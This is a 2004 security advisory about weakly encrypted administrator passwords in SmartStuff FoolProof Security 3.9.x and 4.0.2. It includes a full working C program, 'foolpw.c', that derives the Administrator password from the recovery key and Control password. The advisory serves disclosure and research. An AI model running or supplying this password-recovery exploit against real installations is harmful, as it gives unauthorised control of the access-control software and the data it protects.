SmartStuff FoolProof Security Program Administrator Password Recovery Vulnerability
Published: 2004-06-05
Updated: 2004-06-09
Affected systems:
SmartStuff FoolProof Security 3.9.7
SmartStuff FoolProof Security 3.9.4
SmartStuff FoolProof Security 4.0.2
Unaffected systems:
SmartStuff FoolProof Security 5.0
Description:
BUGTRAQ ID: 10467
FoolProof is a security program from SmartStuff that provides access control for Windows and Mac and can protect system files and folders.
The encryption used to protect the FoolProof administrator password is not strong enough; an attacker can exploit this weakness to recover the application's administrator password.
An attacker can manipulate the password recovery mechanism to obtain the 'Administrator' password, thereby taking control of the application and gaining access to protected data.
<* Source: Cyrillium Security *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
/* The following program calculates the "Administrator" password from the
password recovery key and the "Control" password.
Usage:
Invoke the program with the following arguments:
foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD
Example:
C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
12345
Source code:
*/
/*
foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.
Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.
CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int i;                              /* Index variable */
    char a,                             /* Temporary variable for calculations */
         k[33],                         /* Recovery key in hexadecimal (32 chars + NUL) */
         k_array[17],                   /* Recovery key as an array of 16 bytes */
         c[17],                         /* Control password (up to 16 chars + NUL) */
         hex_temp[3],                   /* Two hex digits plus a NUL terminator for strtoul */
         *endptr;                       /* Output variable for strtoul */
    const char *b = "D:SKFOIJ(*EHJFL";  /* Fixed per-position offsets (15 chars + NUL) */

    if (argc != 3)
    {
        puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
        return 1;
    }
    if (strlen (argv[1]) != 16*2)
    {
        puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
        return 1;
    }
    if (strlen (argv[2]) > 16)
    {
        puts ("Passwords are limited to 16 characters");
        return 1;
    }

    /* Zero each buffer by its own size. The original used sizeof (b), the size
       of a pointer, which left most of k and k_array untouched. */
    memset (k, 0, sizeof (k));
    memset (k_array, 0, sizeof (k_array));
    memset (c, 0, sizeof (c));
    memset (hex_temp, 0, sizeof (hex_temp));
    strcpy (k, argv[1]);
    strcpy (c, argv[2]);

    for (i = 0; i < 16; i++)
    {
        /* Convert one hexadecimal byte; hex_temp[2] stays NUL so strtoul stops there
           (the original 2-byte buffer had no terminator). */
        memcpy (hex_temp, &k[i*2], 2);
        k_array[i] = (char) strtoul (hex_temp, &endptr, 16);
        if (*endptr != '\0')
        {
            printf ("\nInvalid hexadecimal character '%c'\n", *endptr);
            return 1;
        }
        /* Administrator password byte = (control byte + offset byte) XOR key byte */
        a = (c[i] + b[i]) ^ k_array[i];
        putc (a, stdout);
    }
    puts ("");
    return 0;
}
Recommendation:
Vendor patch:
SmartStuff
----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.smartstuff.com/fps/fpsinfo.html
NSFOCUS (绿盟科技) provides your security assurance